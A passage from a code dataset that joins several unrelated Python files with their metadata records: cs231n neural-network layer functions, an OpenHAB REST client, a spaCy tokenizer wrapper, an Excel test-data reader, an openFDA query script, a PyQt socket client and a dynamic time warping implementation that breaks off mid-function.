all_slices = [tuple(slice(start, start+w[0].shape[i]) for i,start in enumerate(j)) for j in all_pos]\n\n if pad:\n pad_ax = [(0, 0)] + [(pad, pad) for i in xrange(x[0].ndim-1)]\n\n for nk, kernel in enumerate(w): # iterate over all kernels\n dx_kernel = np.zeros(x.shape, dtype=x.dtype)\n dkernel = np.zeros_like(kernel, dtype=kernel.dtype)\n for nd, dat in enumerate(x): # iterate over each piece of data to be convolved\n if pad:\n dat = np.pad(dat, pad_ax, mode='constant').astype(dat.dtype)\n\n dy = dout[nd, nk][np.newaxis, :, :]\n ddat = np.zeros((x[0].shape[0], x[0].shape[1]+2*pad, x[0].shape[2]+2*pad), dtype=x[0].dtype)\n\n for i, slices in enumerate(all_slices):\n loc = np.unravel_index(i, outshape)\n dy_val = dy[loc]\n ddat[slices] += dy_val*kernel\n dkernel += dy_val*dat[slices]\n\n if pad:\n ddat = ddat[:, pad:-pad, pad:-pad]\n\n dx_kernel[nd] = ddat[:]\n dw[nk:nk+1] = dkernel\n dx += dx_kernel\n\n return dx, dw, db\n\n\ndef max_pool(x, pool_shape, stride, pooling_axes, backprop=False, dout=None):\n \"\"\" Pool the values of an ndarray, by taking the max over a specified pooling\n filter volume that rasters across the specified axes of x with a given stride.\n\n A backprop flag can be toggled to, instead, perform back-propagation through the\n maxpool layer (i.e. pass gradient values through of the array elements that\n contributed to the forward pooling).\n\n Parameters\n ----------\n x : numpy.ndarray\n Input array to be pooled.\n pool_shape : Iterable[int, ...]\n Shape of the pooling_filter along each specified pooling axis, listed\n in ascending axis order. No entries are provided for non-pooling axes.\n stride : int ( > 0)\n Step size used while rastering the pooling filter across x.\n pooling_axes : Union[int, Iterable[int, ...]]\n The axes along which the values of x will be max-pooled.\n backprop : bool, optional\n Indicates whether or not max_pool performs back propagation\n instead of pooling.\n dout : Union[NoneType, numpy.ndarray]\n \"Upstream\" array, whose values will be back propagated through\n the max-pool layer. This must be specified if backprop is True.\n\n Returns\n -------\n if backprop is False\n out : numpy.ndarray\n An array of the max-pooled values of x.\n\n if backprop is True\n dx : numpy.ndarray (shape=x.shape)\n An array of values from dout back-propagated through the pooling layer.\n \"\"\"\n\n if type(pooling_axes) is int:\n pooling_axes = (pooling_axes)\n pooling_axes = tuple(sorted(pooling_axes))\n\n pool_only_slice = tuple(slice(None, None) if i in pooling_axes else 0 for i in range(x.ndim))\n outshape = get_outshape(x[pool_only_slice].shape, pool_shape, stride)\n\n if backprop:\n assert dout is not None, \"dout must be provided during backprop\"\n mask_view = tuple(np.newaxis if i in pooling_axes else slice(None, None) for i in range(x.ndim))\n dx = np.zeros_like(x, dtype=x.dtype)\n\n else:\n tmp_shape = list(x.shape)\n for i, ax in enumerate(pooling_axes):\n tmp_shape[ax] = outshape[i]\n out = np.zeros(tmp_shape, dtype=x.dtype)\n\n all_slices = [slice(None, None) for i in range(x.ndim)]\n\n # iterate over positions to place the pooling filter\n for i, pos in enumerate(product(*[stride*np.arange(i) for i in outshape])):\n\n slices = all_slices[:]\n # generate slices to make pooling filter views of x\n for j, start in enumerate(pos):\n slices[pooling_axes[j]] = slice(start, start + pool_shape[j])\n slices = tuple(slices)\n\n # generate slices of output array to update\n inds = np.unravel_index(i, outshape)\n loc = all_slices[:]\n for cnt, ax in enumerate(pooling_axes):\n loc[ax] = inds[cnt]\n\n maxes = np.amax(x[slices], axis=pooling_axes)\n\n if not backprop:\n out[loc] = maxes\n else:\n dx[slices][np.where(x[slices] == maxes[mask_view])] = dout[loc].flat\n\n if not backprop:\n return out\n else:\n return dx\n\n\ndef max_pool_forward_naive(x, pool_param):\n \"\"\"\n A naive implementation of the forward pass for a max pooling layer.\n\n Inputs:\n - x: Input data, of shape (N, C, H, W)\n - pool_param: dictionary with the following keys:\n - 'pool_height': The height of each pooling region\n - 'pool_width': The width of each pooling region\n - 'stride': The distance between adjacent pooling regions\n\n Returns a tuple of:\n - out: Output data\n - cache: (x, pool_param)\n \"\"\"\n\n pool_shape = (pool_param['pool_height'], pool_param['pool_width'])\n cache = (x, pool_param)\n return max_pool(x, pool_shape, pool_param['stride'], (2, 3)), cache\n\n\ndef max_pool_backward_naive(dout, cache):\n \"\"\"\n A naive implementation of the backward pass for a max pooling layer.\n\n Inputs:\n - dout: Upstream derivatives\n - cache: A tuple of (x, pool_param) as in the forward pass.\n\n Returns:\n - dx: Gradient with respect to x\n \"\"\"\n x, pool_param = cache\n pool_shape = (pool_param['pool_height'], pool_param['pool_width'])\n return max_pool(x, pool_shape, pool_param['stride'], (2, 3), backprop=True, dout=dout)\n\n\ndef spatial_batchnorm_forward(x, gamma, beta, bn_param):\n \"\"\"\n Computes the forward pass for spatial batch normalization.\n\n Inputs:\n - x: Input data of shape (N, C, H, W)\n - gamma: Scale parameter, of shape (C,)\n - beta: Shift parameter, of shape (C,)\n - bn_param: Dictionary with the following keys:\n - mode: 'train' or 'test'; required\n - eps: Constant for numeric stability\n - momentum: Constant for running mean / variance. momentum=0 means that\n old information is discarded completely at every time step, while\n momentum=1 means that new information is never incorporated. The\n default of momentum=0.9 should work well in most situations.\n - running_mean: Array of shape (D,) giving running mean of features\n - running_var Array of shape (D,) giving running variance of features\n\n Returns a tuple of:\n - out: Output data, of shape (N, C, H, W)\n - cache: Values needed for the backward pass\n \"\"\"\n out, cache = None, None\n\n N, C, H, W = x.shape\n out, cache = batchnorm_forward(x.reshape(-1, C), gamma, beta, bn_param)\n\n #############################################################################\n # TODO: Implement the forward pass for spatial batch normalization. #\n # #\n # HINT: You can implement spatial batch normalization using the vanilla #\n # version of batch normalization defined above. Your implementation should #\n # be very short; ours is less than five lines. #\n #############################################################################\n pass\n #############################################################################\n # END OF YOUR CODE #\n #############################################################################\n\n return out.reshape(N, C, H, W), cache\n\n\ndef spatial_batchnorm_backward(dout, cache):\n \"\"\"\n Computes the backward pass for spatial batch normalization.\n\n Inputs:\n - dout: Upstream derivatives, of shape (N, C, H, W)\n - cache: Values from the forward pass\n\n Returns a tuple of:\n - dx: Gradient with respect to inputs, of shape (N, C, H, W)\n - dgamma: Gradient with respect to scale parameter, of shape (C,)\n - dbeta: Gradient with respect to shift parameter, of shape (C,)\n \"\"\"\n dx, dgamma, dbeta = None, None, None\n N, C, H, W = dout.shape\n\n dx, dgamma, dbeta = batchnorm_backward_alt(dout.reshape(-1, C), cache)\n #############################################################################\n # TODO: Implement the backward pass for spatial batch normalization. #\n # #\n # HINT: You can implement spatial batch normalization using the vanilla #\n # version of batch normalization defined above. Your implementation should #\n # be very short; ours is less than five lines. #\n #############################################################################\n pass\n #############################################################################\n # END OF YOUR CODE #\n #############################################################################\n\n return dx.reshape(N, C, H, W), dgamma, dbeta\n\n\ndef svm_loss(x, y):\n \"\"\"\n Computes the loss and gradient using for multiclass SVM classification.\n\n Inputs:\n - x: Input data, of shape (N, C) where x[i, j] is the score for the jth class\n for the ith input.\n - y: Vector of labels, of shape (N,) where y[i] is the label for x[i] and\n 0 <= y[i] < C\n\n Returns a tuple of:\n - loss: Scalar giving the loss\n - dx: Gradient of the loss with respect to x\n \"\"\"\n N = x.shape[0]\n correct_class_scores = x[np.arange(N), y]\n margins = np.maximum(0, x - correct_class_scores[:, np.newaxis] + 1.0)\n margins[np.arange(N), y] = 0\n loss = np.sum(margins) / N\n num_pos = np.sum(margins > 0, axis=1)\n dx = np.zeros_like(x)\n dx[margins > 0] = 1\n dx[np.arange(N), y] -= num_pos\n dx /= N\n return loss, dx\n\n\ndef softmax_loss(x, y):\n \"\"\"\n Computes the loss and gradient for softmax classification.\n\n Inputs:\n - x: Input data, of shape (N, C) where x[i, j] is the score for the jth class\n for the ith input.\n - y: Vector of labels, of shape (N,) where y[i] is the label for x[i] and\n 0 <= y[i] < C\n\n Returns a tuple of:\n - loss: Scalar giving the loss\n - dx: Gradient of the loss with respect to x\n \"\"\"\n probs = np.exp(x - np.max(x, axis=1, keepdims=True))\n probs /= np.sum(probs, axis=1, keepdims=True)\n N = x.shape[0]\n loss = -np.sum(np.log(probs[np.arange(N), y])) / N\n dx = probs.copy()\n dx[np.arange(N), y] -= 1\n dx /= N\n return loss, dx\n", "sub_path": "assignment2/cs231n/layers.py", "file_name": "layers.py", "file_ext": "py", "file_size_in_byte": 26335, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "numpy.maximum", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.einsum", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.einsum", "line_number": 212, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 213, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 239, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 239, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 245, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 324, "usage_type": "call"}, {"api_name": "scipy.signal.fftconvolve", "line_number": 325, "usage_type": "name"}, {"api_name": "scipy.signal.convolve", "line_number": 327, "usage_type": "name"}, {"api_name": "numpy.fromiter", "line_number": 335, "usage_type": "call"}, {"api_name": "numpy.all", "line_number": 342, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 346, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 346, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 347, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 370, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.fromiter", "line_number": 374, "usage_type": "call"}, {"api_name": "numpy.rint", "line_number": 383, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 417, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 446, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 475, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 476, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 477, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 482, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 483, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 484, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 487, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 487, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 494, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 495, "usage_type": "call"}, {"api_name": "numpy.pad", "line_number": 498, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 500, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 501, "usage_type": "call"}, {"api_name": "numpy.unravel_index", "line_number": 504, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 565, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 566, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 572, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 577, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 577, "usage_type": "call"}, {"api_name": "numpy.unravel_index", "line_number": 586, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 591, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 596, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 730, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 731, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 731, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 732, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 733, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 734, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 735, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 737, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 756, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 756, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 757, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 759, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 759, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 759, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 761, "usage_type": "call"}]}
+{"seq_id": "1144281", "text": "import requests\nimport base64\nclass OpenHab:\n\n def __init__(self): \n self.openhab_host = \"localhost\"\n self.openhab_port = \"8080\"\n\n def post_command(self, key, value):\n print(\"appel de post_command(\" + key +\",\"+ value +\")\")\n \"\"\" Post a command to OpenHAB - key is item, value is command \"\"\"\n url = 'http://%s:%s/rest/items/%s'%(self.openhab_host,\n self.openhab_port, key)\n try:\n req = requests.post(url, data=value,\n headers=self.basic_header())\n except requests.ConnectionError:\n print (\" Erreur dans l'adressage du serveur openHab\")\n\n def put_status(self, key, value):\n \"\"\" Put a status update to OpenHAB key is item, value is state \"\"\"\n url = 'http://%s:%s/rest/items/%s/state'%(self.openhab_host,\n self.openhab_port, key)\n req = requests.put(url, data=value, headers=self.basic_header())\n if req.status_code != requests.codes.ok:\n req.raise_for_status()\n\n def get_status(self, name):\n \"\"\" Request updates for any item in group NAME from OpenHAB.\n Long-polling will not respond until item updates.\n \"\"\"\n # When an item in Group NAME changes we will get all items in the group \n # and need to determine which has changed\n url = 'http://%s:%s/rest/items/%s'%(self.openhab_host,\n self.openhab_port, name)\n payload = {'type': 'json'}\n try:\n req = requests.get(url, params=payload,\n headers=self.polling_header())\n if req.status_code != requests.codes.ok:\n req.raise_for_status()\n # Try to parse JSON response\n # At top level, there is type, name, state, link and members array\n members = req.json()[\"members\"]\n for member in members:\n # Each member has a type, name, state and link\n name = member[\"name\"]\n state = member[\"state\"]\n do_publish = True\n # Pub unless we had key before and it hasn't changed\n if name in self.prev_state_dict:\n if self.prev_state_dict[name] == state:\n do_publish = False\n self.prev_state_dict[name] = state\n if do_publish:\n self.publish(name, state)\n except:\n print(\"error located in openhab.py\")\n\n def basic_header(self):\n \"\"\" Header for OpenHAB REST request - standard \"\"\"\n \"\"\"self.auth = base64.encodestring('%s:%s'\n %(self.username, self.password)\n ).replace('\\n', '')\"\"\"\n return {\n #\"Authorization\" : \"Basic %s\" %self.auth,\n \"Content-type\": \"text/plain\"}\n\n\n", "sub_path": "openhab.py", "file_name": "openhab.py", "file_ext": "py", "file_size_in_byte": 2933, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "requests.post", "line_number": 15, "usage_type": "call"}, {"api_name": "requests.ConnectionError", "line_number": 17, "usage_type": "attribute"}, {"api_name": "requests.put", "line_number": 24, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 25, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 38, "usage_type": "call"}, {"api_name": "requests.codes", "line_number": 40, "usage_type": "attribute"}]}
+{"seq_id": "593230159", "text": "\"\"\"\nThe wrapper over the spaCy's Tokenizer for `English`,`German`,`Spanish`,`Portuguese`,`French`,`Italian`, and `Dutch`.\n Based on the library's documentation website, the tokenization algorithm can be summarized as follows:\n 1. Iterate over space-separated substrings\n 2. Check whether we have an explicitly defined rule for this substring. If we do, use it.\n 3. Otherwise, try to consume a prefix.\n 4. If we consumed a prefix, go back to the beginning of the loop, so that special-cases always get priority.\n 5. If we didn't consume a prefix, try to consume a suffix.\n 6. If we can't consume a prefix or suffix, look for \"infixes\" — stuff like hyphens etc.\n 7. Once we can't consume any more of the string, handle it as a single token.\nFor more info regarding the tokenizer please see the \"Tokenization\" part of https://spacy.io/usage/linguistic-features\nA valid use case of the tokenizer wrapper class could be:\n SpaCyTokenizer().tokenize(\"This is a test\", LanguageIdentifier.en)\n\"\"\"\nfrom typing import List\n\nimport spacy\n\nfrom translate.readers.constants import LanguageIdentifier as LId\n\n__author__ = \"Hassan S. Shavarani\"\n\n\nclass SpaCyTokenizer:\n def __init__(self):\n \"\"\"\n The tokenizer performs lazy instantiation of the models. You don't need multiple instances of this class for\n tokenization of sentences from different languages.\n \"\"\"\n self._models = {}\n self._supported_languages = [LId.en, LId.de, LId.es, LId.pt, LId.fr, LId.it, LId.nl]\n\n def tokenize(self, text: str, lang_identifier: LId, lower_case: bool = False) -> List[str]:\n \"\"\"\n :param text: the string to be tokenized\n :param lang_identifier: one of the langugage values defined in `translate.readers.constants.LanguageIdentifier`\n :param lower_case: the flag indicating whether the resulting tokens need to be lower-cased or not.\n :return: the list of tokenized strings\n \"\"\"\n if lang_identifier not in self._supported_languages:\n raise ValueError(\"SpaCyTokenizer cannot tokenize utterances in \\\"{}\\\"\".format(lang_identifier.name))\n if lang_identifier not in self._models:\n try:\n self._models[lang_identifier] = spacy.load(lang_identifier.name)\n except OSError:\n raise EnvironmentError(\"The spaCy resources for \\\"{0}\\\" might not be installed correctly, please try \"\n \"running the following command in your comman-line before running this project\\n\"\n \"python -m spacy download {0}\".format(lang_identifier.name))\n tokenized_document = self._models[lang_identifier].tokenizer(text)\n if lower_case:\n return [token.text.lower() for token in tokenized_document]\n else:\n return [token.text for token in tokenized_document]\n", "sub_path": "src/translate/readers/tokenizer.py", "file_name": "tokenizer.py", "file_ext": "py", "file_size_in_byte": 2903, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "translate.readers.constants.LanguageIdentifier.en", "line_number": 31, "usage_type": "attribute"}, {"api_name": "translate.readers.constants.LanguageIdentifier", "line_number": 31, "usage_type": "name"}, {"api_name": "translate.readers.constants.LanguageIdentifier.de", "line_number": 31, "usage_type": "attribute"}, {"api_name": "translate.readers.constants.LanguageIdentifier.es", "line_number": 31, "usage_type": "attribute"}, {"api_name": "translate.readers.constants.LanguageIdentifier.pt", "line_number": 31, "usage_type": "attribute"}, {"api_name": "translate.readers.constants.LanguageIdentifier.fr", "line_number": 31, "usage_type": "attribute"}, {"api_name": "translate.readers.constants.LanguageIdentifier.it", "line_number": 31, "usage_type": "attribute"}, {"api_name": "translate.readers.constants.LanguageIdentifier.nl", "line_number": 31, "usage_type": "attribute"}, {"api_name": "translate.readers.constants.LanguageIdentifier", "line_number": 33, "usage_type": "name"}, {"api_name": "spacy.load", "line_number": 44, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 33, "usage_type": "name"}]}
+{"seq_id": "549646007", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@Time : 2020/6/3 11:10\n@Author : WangHuan\n@Contact : hi_chengzi@126.com\n@File : data.py\n@Software: PyCharm\n@description: 读取excel中的数据方便testcase直接使用\n\"\"\"\n\nimport os\nimport json\nimport xlrd\n\n\nclass ReadData(object):\n\n def __init__(self, filename):\n scr_path = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n data_path = os.path.join(scr_path, \"data\", filename)\n data_open = xlrd.open_workbook(data_path)\n self.data_excel = data_open.sheet_by_index(0)\n\n def get_url(self):\n '''\n 获取请求的url\n :return:\n '''\n url = self.data_excel.cell(1, 3).value\n return url\n\n def get_method(self, case_name):\n '''\n 获取请求类型\n :param case_name:\n :return:\n '''\n return self.get_case(case_name=case_name)[4]\n\n def get_data(self, case_name):\n '''\n 获取请求数据,转化为字典格式\n :param case_name:\n :return:\n '''\n return json.loads(self.get_case(case_name)[6])\n\n def get_expect(self, case_name):\n '''\n 期望结果\n :param case_name:\n :return:\n '''\n return self.get_case(case_name)[7]\n\n def get_case(self, case_name):\n '''\n 根据case_name找到对应用例行\n :param case_name:\n :return: 用例所在行\n '''\n\n for i in range(1, self.data_excel.nrows):\n if self.data_excel.cell(i, 1).value == case_name:\n return self.data_excel.row_values(i)\n\n print(\"用例名称未找到\")\n return None\n\n\nif __name__ == '__main__':\n data = ReadData(\"test_login_data.xlsx\")\n url = data.get_url()\n method = data.get_method(\"test_login_normal\")\n json = data.get_data(\"test_login_normal\")\n expect = data.get_expect(\"test_login_normal\")\n print(url, method)\n print(type(json))\n print(json)\n print(expect)\n", "sub_path": "interface/src/common/data.py", "file_name": "data.py", "file_ext": "py", "file_size_in_byte": 2006, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.path.dirname", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "xlrd.open_workbook", "line_number": 22, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 47, "usage_type": "call"}]}
+{"seq_id": "411078685", "text": "# Importamos los módulos y bibliotecas necesarios para realizar este programa\nimport http.client\nimport json\n\n# Empleamos un código que utiliza la biblioteca http.client que hemos importado para leer repositorios\nheaders = {'User-Agent': 'http-client'}\nconn = http.client.HTTPSConnection(\"api.fda.gov\")\nconn.request(\"GET\", \"/drug/label.json?limit=10\", None, headers) # Con limit=10 encontraremos 10 medicamentos distintos\nr1 = conn.getresponse()\nprint(r1.status, r1.reason)\nrepos_raw = r1.read().decode(\"utf-8\")\nconn.close()\ninformacion = json.loads(repos_raw)\n\n# sabemos que en la página a la que accedemos el contenido es json y json se encuentra en forma de diccionario por tanto utilizamos las funciones de un diccionario para encontrar los diferentes elementos\nmedicamento_info=informacion[\"results\"]\n\n# Indexamos entre los distintos elementos de la página para imprimir los diez que hay en ella\nfor i in range(len(medicamento_info)):\n info = medicamento_info[i]\n print(\"Id del medicamento:\",info[\"id\"])\n", "sub_path": "openfda-1/Programa 2.py", "file_name": "Programa 2.py", "file_ext": "py", "file_size_in_byte": 1019, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "http.client.client.HTTPSConnection", "line_number": 7, "usage_type": "call"}, {"api_name": "http.client.client", "line_number": 7, "usage_type": "attribute"}, {"api_name": "http.client", "line_number": 7, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 13, "usage_type": "call"}]}
+{"seq_id": "152187708", "text": "from PyQt5.QtCore import QThread, pyqtSignal\nimport socket\nimport errno\n\n\nclass ClientThread(QThread):\n oppo = pyqtSignal(str)\n rply = pyqtSignal(str)\n error = pyqtSignal(str)\n rematch = pyqtSignal(str)\n draw = pyqtSignal(str)\n\n def __init__(self, username, ip, parent=None):\n super(ClientThread, self).__init__(parent)\n self.username = username\n self.ip = ip\n\n def run(self):\n rcv = False\n self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n self.s.connect((self.ip, 1234))\n self.s.sendall(bytes(self.username, 'utf-8'))\n except ConnectionRefusedError as e:\n self.error.emit(\"nTarget Refused to Connect\")\n\n try:\n while True:\n msg = self.s.recv(10)\n msg = msg.decode('utf-8')\n\n if not rcv:\n self.oppo.emit(msg)\n rcv = True\n\n elif msg == \"D\":\n self.draw.emit(msg)\n\n elif msg == \"R\":\n self.rematch.emit(msg)\n\n else:\n self.rply.emit(msg)\n\n except IOError as e:\n if e.errno != errno.EAGAIN and e.errno != errno.EWOULDBLOCK:\n if rcv:\n self.error.emit(\"yOpponent Disconnected\")\n\n except Exception as e:\n self.error.emit('yUnknown Error: {}'.format(str(e)))\n\n def send(self, data):\n self.s.sendall(bytes(data, \"utf-8\"))\n", "sub_path": "Client.py", "file_name": "Client.py", "file_ext": "py", "file_size_in_byte": 1513, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "PyQt5.QtCore.QThread", "line_number": 6, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 7, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 8, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 9, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 10, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 11, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 20, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 20, "usage_type": "attribute"}, {"api_name": "socket.SOCK_STREAM", "line_number": 20, "usage_type": "attribute"}, {"api_name": "errno.EAGAIN", "line_number": 46, "usage_type": "attribute"}, {"api_name": "errno.EWOULDBLOCK", "line_number": 46, "usage_type": "attribute"}]}
+{"seq_id": "306234088", "text": "# Macros and libararies\nfrom math import isinf\nfrom numpy import array, zeros, full, argmin, inf, ndim\nimport numpy as np\nimport torch as T\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\ndef _traceback(D):\n i, j = array(D.shape) - 2\n p, q = [i], [j]\n while (i > 0) or (j > 0):\n tb = argmin((D[i, j], D[i, j + 1], D[i + 1, j]))\n if tb == 0:\n i -= 1\n j -= 1\n elif tb == 1:\n i -= 1\n else: # (tb == 2):\n j -= 1\n p.insert(0, i)\n q.insert(0, j)\n return array(p), array(q)\n\ndef dtw(x, y, dist, warp=1, w=inf, s=1.0):\n \"\"\"\n Computes Dynamic Time Warping (DTW) of two sequences.\n :param array x: N1*M array\n :param array y: N2*M array\n :param func dist: distance used as cost measure\n :param int warp: how many shifts are computed.\n :param int w: window size limiting the maximal distance between indices of matched entries |i,j|.\n :param float s: weight applied on off-diagonal moves of the path. As s gets larger, the warping path is increasingly biased towards the diagonal\n Returns the minimum distance, the cost matrix, the accumulated cost matrix, and the wrap path.\n \"\"\"\n assert len(x)\n assert len(y)\n assert isinf(w) or (w >= abs(len(x) - len(y)))\n assert s > 0\n r, c = len(x), len(y)\n if not isinf(w):\n D0 = full((r + 1, c + 1), inf)\n for i in range(1, r + 1):\n D0[i, max(1, i - w):min(c + 1, i + w + 1)] = 0\n D0[0, 0] = 0\n else:\n D0 = zeros((r + 1, c + 1))\n D0[0, 1:] = inf\n D0[1:, 0] = inf\n D1 = D0[1:, 1:] # view\n for i in range(r):\n for j in range(c):\n if (isinf(w) or (max(0, i - w) <= j <= min(c, i + w))):\n D1[i, j] = dist(x[i], y[j])\n C = D1.copy()\n jrange = range(c)\n for i in range(r):\n if not isinf(w):\n jrange = range(max(0, i - w), min(c, i + w + 1))\n for j in jrange:\n min_list = [D0[i, j]]\n for k in range(1, warp + 1):\n i_k = min(i+k, r)\n j_k = min(j+k, c)\n min_list += [D0[i_k, j] * s, D0[i, j_k] * s]\n D1[i, j] += min(min_list)\n if len(x) == 1:\n path = zeros(len(y)), range(len(y))\n elif len(y) == 1:\n path = range(len(x)), zeros(len(x))\n else:\n path = _traceback(D0)\n return D1[-1, -1], C, D1, path\n\n\n\n# We define two sequences x, y as numpy array\n# where y is actually a sub-sequence from x\nx = np.array([2, 0, 1, 1, 2, 4, 2, 1, 2, 0]).reshape(-1, 1)\ny = np.array([1, 1, 2, 4, 2, 1, 2, 0]).reshape(-1, 1)\n\n\neuclidean_norm = lambda x, y: np.abs(x - y)\n\nd, cost_matrix, acc_cost_matrix, path = dtw(x, y, dist=euclidean_norm)\n\n\n# You can also visualise the accumulated cost and the shortest path\nimport matplotlib.pyplot as plt\n\nplt.imshow(acc_cost_matrix.T, origin='lower', cmap='gray', interpolation='nearest')\nplt.plot(path[0], path[1], 'w')\n#plt.show()\n\n\n\n\n# this cannot handle inf, -\\rho * x too big, e^{- \\rho * x} close to 0\ndef smooth_min(x, rho=10):\n eps = 1e-12\n val = -1/rho * T.log(T.mean(T.exp(x * (-rho))) + eps)\n assert val!=float('inf'), T.mean(T.exp(x * (-rho)))\n return val\n\nrho = 10\nx = T.tensor([100.0, 2.0231, 100.0])\nprint (smooth_min(x,rho))\n\n\n# 1d min func is 1\n\n\n# this will serve as a loss function\ndef _traceback(D):\n i, j = array(D.shape) - 2\n p, q = [i], [j]\n while (i > 0) or (j > 0):\n tb = argmin((D[i, j], D[i, j + 1], D[i + 1, j]))\n if tb == 0:\n i -= 1\n j -= 1\n elif tb == 1:\n i -= 1\n else: # (tb == 2):\n j -= 1\n p.insert(0, i)\n q.insert(0, j)\n return array(p), array(q)\n\n\ndef diff_dtw_loss(x, y, dist, warp=1, w=inf, s=1.0, rho=40):\n \"\"\" differentiable dtw, takes two sequences and\n compute the distance under the metric\n x, y is a tensor seq_len x dim\n dist is a bi-variate function\n \"\"\"\n\n assert x.shape[0]\n assert y.shape[0]\n assert isinf(w) or (w >= abs(len(x) - len(y)))\n assert s > 0\n\n MAX_VAL = 1e2\n\n r, c = x.shape[0], y.shape[0]\n if not isinf(w):\n D0 = T.full((r + 1, c + 1), MAX_VAL)\n for i in range(1, r + 1):\n D0[i, max(1, i - w):min(c + 1, i + w + 1)] = 0\n D0[0, 0] = 0\n else:\n D0 = T.zeros(r + 1, c + 1)\n D0[0, 1:] = MAX_VAL\n D0[1:, 0] = MAX_VAL\n D1 = D0[1:, 1:] # view\n for i in range(r):\n for j in range(c):\n #print(\"dtw size\", x.size(), y.size())\n if (isinf(w) or (max(0, i - w) <= j <= min(c, i + w))):\n D1[i, j] = dist(x[0][i], y[0][j])\n C = D1.clone()\n jrange = range(c)\n for i in range(r):\n if not isinf(w):\n jrange = range(max(0, i - w), min(c, i + w + 